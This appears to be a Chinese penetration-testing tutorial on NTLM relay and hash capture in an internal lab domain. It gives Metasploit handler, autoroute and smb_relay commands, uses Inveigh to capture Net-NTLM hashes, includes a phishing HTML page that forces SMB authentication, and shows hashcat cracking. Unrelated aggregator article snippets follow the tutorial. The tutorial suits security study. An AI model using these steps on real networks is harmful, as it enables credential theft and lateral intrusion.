内网渗透之横向移动NTMLRelay(中继)攻击-InveighNTLM-Relay重放

news/2024/9/22 18:31:36/

横向移动 NTLM中继攻击 Relay重放(smb)

适用于无法获取hash或密码时使用
NTML Relay重放包括smb to relay ldap ews
webserver:
执行下面的命令时会默认以当前用户名和密码去登录目标计算机

dir \\ 192.168.3.32\c$

在这里插入图片描述
webserver切换到本地的administrator时

dir \\ 192.168.3.32\c$

在这里插入图片描述
出现这种现象的原因是webserver和sqlserver的本地管理员的密码是一样的,所以能登录成功,weadmin在sqlserver是没有登录的,当前没有这个用户所以匹配肯定失败,默认以当前用户尝试登录的

环境:
god.org
条件:双方用户名密码一致
1.cs转发至msf
cs:

spawn liandong   #监听器的名字

msf
监听上线:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8000
run

在这里插入图片描述
2.添加路由:

run post/multi/manage/autoroute 

3.进行smb重放攻击
注意如果要使用administrator尝试登录的话,如果当前权限是system,可以使用msf或cs进行降权,ps migrate pid(adminstrator运行的id)

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32                                         #要攻击的地址
set lhost 192.168.85.129 
set autorunscript post/windows/manage/migrate
set payload windows/meterpreter/bind_tcp                       #64位没成功
set rhost 192.168.3.32                                         
run

webserver操作,注意这里要用aminsitrator用户

 dir \\192.168.85.129\c$`

成功上线
在这里插入图片描述
kali相当于中间人,利用webserver发送的账号密码去连接sqlserver

横向移动 NTLM中继攻击 Inveigh嗅探 Hash破解

条件:被控主机当前管理员权限
Responder中继攻击-NTLM Hash破解
1、监听拦截
放在websever上
Inveigh.exe
获取到的是NET NTLM HASH V1或V2
此hash是挑战hash,是不能直接用来hash传递攻击的
在这里插入图片描述
在但前文件会生成hash的一个txt文件
在这里插入图片描述
2、触发拦截
需要有请求的动作,不需要非得访问webserver,只要有用户名和密码验证就能抓到

dir \\192.168.3.32\c$

钓鱼触发
发邮件给内网其他主机
http://192.168.3.31/1.html
1.html

<!DOCTYPE html>
<html>
<head><title></title>
</head>
<body><img src="file:///\\192.168.3.32\2">
</body>
</html>

3、kali的hashcat 破解密文

hashcat -m 5600 hash1 pass2.txt 
hashcat -m 5600 hash1 pass2.txt  --show

在这里插入图片描述
hashcat可能会报错,包处理器内存不够
需要修改为单核单处理器,并把内存调到4g,注意关机操作
在这里插入图片描述

hashcat报错


http://www.ppmy.cn/news/56345.html

相关文章

「华熙生物」发来感谢信,企企通赋能生物科技领域数字化采购建设

近日&#xff0c;华熙生物科技股份有限公司&#xff08;以下简称“华熙生物”&#xff09;携手企企通打造的数字化采购管理平台成功上线。为感谢企企通在采购数字化项目上的付出和努力&#xff0c;华熙生物特意发来暖心感谢信。 在感谢信中&#xff0c;华熙生物表示&#xff1a…

【LeetCode】222.完全二叉树的节点数

1.问题 给你一棵 完全二叉树 的根节点 root &#xff0c;求出该树的节点个数。 完全二叉树 的定义如下&#xff1a;在完全二叉树中&#xff0c;除了最底层节点可能没填满外&#xff0c;其余每层节点数都达到最大值&#xff0c;并且最下面一层的节点都集中在该层最左边的若干位…

fengMap蜂鸟免费地图使用时报错:Uncaught Error: invalid wire type xx at offset xx

目录 一、问题 二、原因及解决方法 三、总结 tips:如嫌繁琐,直接看总结即可 一、问题 1.加载蜂鸟提供的免费地图时一直报错,无法正常加载地图: 1)具体错误:ngmap.map.min.js:1104 Uncaught Error: invalid wire type 7 at offset 47 at u.skipType (fengmap.map.m…

【2023 年第十三届 MathorCup 高校数学建模挑战赛】A 题 量子计算机在信用评分卡组合优化中的应用 42页论文及代码

【2023 年第十三届 MathorCup 高校数学建模挑战赛】A 题 量子计算机在信用评分卡组合优化中的应用 42页论文及代码 相关信息 【2023 年第十三届 MathorCup 高校数学建模挑战赛】A 题 量子计算机在信用评分卡组合优化中的应用 详细建模过程解析及代码实现 1 题目 在银行信用…

【chatGPT 对JavaScript中的类是如何解释的】

chatGPT 对JavaScript中的类是如何解释的 问1&#xff1a;在js中类定义好后&#xff0c;方法与属性应怎样定&#xff0c;它有格式吗&#xff1f; 答1&#xff1a; 在JavaScript中定义类的方式有多种&#xff0c;其中一种是使用ES6的class关键字。在使用class定义类时&#x…

结构型模式-装饰者模式

装饰者模式 概述 我们先来看一个快餐店的例子。 快餐店有炒面、炒饭这些快餐&#xff0c;可以额外附加鸡蛋、火腿、培根这些配菜&#xff0c;当然加配菜需要额外加钱&#xff0c;每个配菜的价钱通常不太一样&#xff0c;那么计算总价就会显得比较麻烦。 使用继承的方式存在…

SAP MRP例外信息解释

SAP中MRP的例外信息&#xff0c;一共分为八类&#xff0c;下面是所有例外信息的解释 第一类&#xff1a; 69&#xff1a;BOM组件可能是递归的&#xff0c;即自己的子集中包括了自己。 02&#xff1a;订单创建日期在过去&#xff0c;可能是没有及时处理&#xff0c;这个建议表…

【Python】selenium工具

目录 1. 安装 2. 测试 3. 无头浏览器 4. 元素定位 5. 页面滑动 6. 按键、填写登录表单 7. 页面切换 Selenium是Web的自动化测试工具&#xff0c;为网站自动化测试而开发&#xff0c;Selenium可以直接运行在浏览器上&#xff0c;它支持所有主流的浏览器&#xff0c;可以接…